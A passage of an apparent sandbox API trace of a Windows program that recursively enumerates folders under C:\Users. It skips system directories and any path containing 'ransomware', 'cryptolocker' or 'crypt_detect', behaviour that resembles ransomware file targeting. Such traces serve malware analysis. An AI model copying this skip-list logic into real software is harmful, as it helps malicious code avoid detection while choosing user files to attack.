ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.198] StrCmpW (psz1="..", psz2=".") returned 1 [0119.198] StrCmpW (psz1="..", psz2="..") returned 0 [0119.198] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.198] StrCmpW (psz1="AppData", psz2=".") returned 1 [0119.198] StrCmpW (psz1="AppData", psz2="..") returned 1 [0119.198] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0119.198] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0119.198] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="AppData", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\boot\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="crypt_detect") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="cryptolocker") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="ransomware") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.198] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0119.199] GetProcessHeap () returned 0xe30000 [0119.199] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c4) returned 0xef3600 [0119.199] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0119.199] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\*", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\*") returned="C:\\Users\\Default.migrated\\AppData\\*" [0119.199] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1df0 [0119.199] StrCmpW (psz1=".", psz2=".") returned 0 [0119.199] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7205420a, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7205420a, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.199] StrCmpW (psz1="..", psz2=".") returned 1 [0119.199] StrCmpW (psz1="..", psz2="..") returned 0 [0119.199] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0119.199] StrCmpW (psz1="Local", psz2=".") returned 1 [0119.199] StrCmpW (psz1="Local", psz2="..") returned 1 [0119.199] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default.migrated\\AppData", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData") returned="C:\\Users\\Default.migrated\\AppData" [0119.199] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\") returned="C:\\Users\\Default.migrated\\AppData\\" [0119.199] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\", psz2="Local", cchMax=1092 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0119.199] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.200] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0119.200] GetProcessHeap () returned 0xe30000 [0119.200] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed39f8 [0119.200] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0119.200] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\*") returned="C:\\Users\\Default.migrated\\AppData\\Local\\*" [0119.200] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\AppData\\Local\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1e70 [0119.201] StrCmpW (psz1=".", psz2=".") returned 0 [0119.201] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.201] StrCmpW (psz1="..", psz2=".") returned 1 [0119.201] StrCmpW (psz1="..", psz2="..") returned 0 [0119.201] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.201] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.201] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.201] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default.migrated\\AppData\\Local", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local") returned="C:\\Users\\Default.migrated\\AppData\\Local" [0119.201] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\") returned="C:\\Users\\Default.migrated\\AppData\\Local\\" [0119.201] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\", psz2="Microsoft", cchMax=1104 | out: psz1="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft" [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.201] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0119.201] FindNextFileW (in: hFindFile=0xec1e70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0119.201] FindClose (in: hFindFile=0xec1e70 | out: hFindFile=0xec1e70) returned 1 [0119.201] GetProcessHeap () returned 0xe30000 [0119.201] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.201] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7202dfa5, ftLastAccessTime.dwHighDateTime=0x1d32720, ftLastWriteTime.dwLowDateTime=0x7202dfa5, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0119.201] FindClose (in: hFindFile=0xec1df0 | out: hFindFile=0xec1df0) returned 1 [0119.202] GetProcessHeap () returned 0xe30000 [0119.202] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.202] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0119.202] StrCmpW (psz1="Documents", psz2=".") returned 1 [0119.202] StrCmpW (psz1="Documents", psz2="..") returned 1 [0119.202] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default.migrated", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated") returned="C:\\Users\\Default.migrated" [0119.202] StrNCatW (in: psz1="C:\\Users\\Default.migrated", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\") returned="C:\\Users\\Default.migrated\\" [0119.202] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\", psz2="Documents", cchMax=1076 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\boot\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.202] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="crypt_detect") returned 0x0 [0119.203] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="cryptolocker") returned 0x0 [0119.203] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="ransomware") returned 0x0 [0119.203] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0119.203] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.203] StrStrIW (lpFirst="C:\\Users\\Default.migrated\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0119.203] GetProcessHeap () returned 0xe30000 [0119.203] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xef3600 [0119.203] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default.migrated\\Documents", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents") returned="C:\\Users\\Default.migrated\\Documents" [0119.203] StrNCatW (in: psz1="C:\\Users\\Default.migrated\\Documents", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\Default.migrated\\Documents\\*") returned="C:\\Users\\Default.migrated\\Documents\\*" [0119.203] FindFirstFileW (in: lpFileName="C:\\Users\\Default.migrated\\Documents\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1ab0 [0119.205] StrCmpW (psz1=".", psz2=".") returned 0 [0119.205] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.205] StrCmpW (psz1="..", psz2=".") returned 1 [0119.205] StrCmpW (psz1="..", psz2="..") returned 0 [0119.205] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99a3d0f, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99a3d0f, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99a3d0f, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0119.205] StrCmpW (psz1="My Music", psz2=".") returned 1 [0119.205] StrCmpW (psz1="My Music", psz2="..") returned 1 [0119.205] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0119.205] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0119.205] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0119.205] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0119.205] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0119.205] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0119.205] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99c9f63, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99c9f63, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99c9f63, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0119.205] FindClose (in: hFindFile=0xec1ab0 | out: hFindFile=0xec1ab0) returned 1 [0119.206] GetProcessHeap () returned 0xe30000 [0119.206] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.206] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4204fb0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5636bd87, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0119.206] FindClose (in: hFindFile=0xec1eb0 | out: hFindFile=0xec1eb0) returned 1 [0119.206] GetProcessHeap () returned 0xe30000 [0119.206] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0119.206] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a9bc987, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5f69dfa, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5f69dfa, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.206] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.206] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.206] FindNextFileW (in: hFindFile=0xec1d30, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 1 [0119.206] StrCmpW (psz1="FD1HVy", psz2=".") returned 1 [0119.206] StrCmpW (psz1="FD1HVy", psz2="..") returned 1 [0119.206] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0119.206] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0119.206] StrNCatW (in: psz1="C:\\Users\\", psz2="FD1HVy", cchMax=1042 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system32\\") returned 0x0 [0119.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\system\\") returned 0x0 [0119.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.207] 